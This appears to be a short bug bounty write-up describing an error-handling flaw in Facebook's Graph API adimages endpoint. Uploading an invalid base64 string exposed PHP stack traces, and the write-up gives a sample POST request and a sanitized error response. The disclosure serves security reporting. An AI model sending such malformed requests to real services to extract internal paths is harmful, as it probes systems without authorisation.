Posted on December 31, 2019

Facebook Source Code disclosure in ads API

Facebook Ads Manager allows users to create and publish ads to Facebook. When users upload their images using User Interface, Facebook uploads those Ad Images through Graph API in the owner’s ad_account.

Endpoint weaknesses was uploading a corrupted image or invalid BASE64 string then the application does not properly handle exception errors that occur during processing image resize. PHP script error revealing some internal path, functions of the program. The endpoint handling errors/exceptions were poorly which should generally not be accessible internal stack traces to users.

Proof of concept

Sending a POST request to adimages edge from the following paths:

Request:

POST /v2.10/act_{ad_account_id}/adimages HTTP/1.1 Host: graph.facebook.com Bytes=BASE_64:VGhpcyBpcyBtYWxpY2lvdXMgYmFzZTY0IHN0cmluZw==

Response:

{ "error": { "message": "Invalid parameter", "type": "FacebookApiException", "code": 100, "error_data": "exception 'Exception' with message 'gxx_ixx_rxxx_muxxx_thrift call to sxxxXxxXx failed with fxxxx exception: 43 in /var\/www\/flib\/rxx\/xxx\/xxx.php:1692

Stack trace:

#0 \/var\/www\/flib\xxx.... //--sanitized--//

Impact

This could have leaked some internal stack traces and exceptions.

Timeline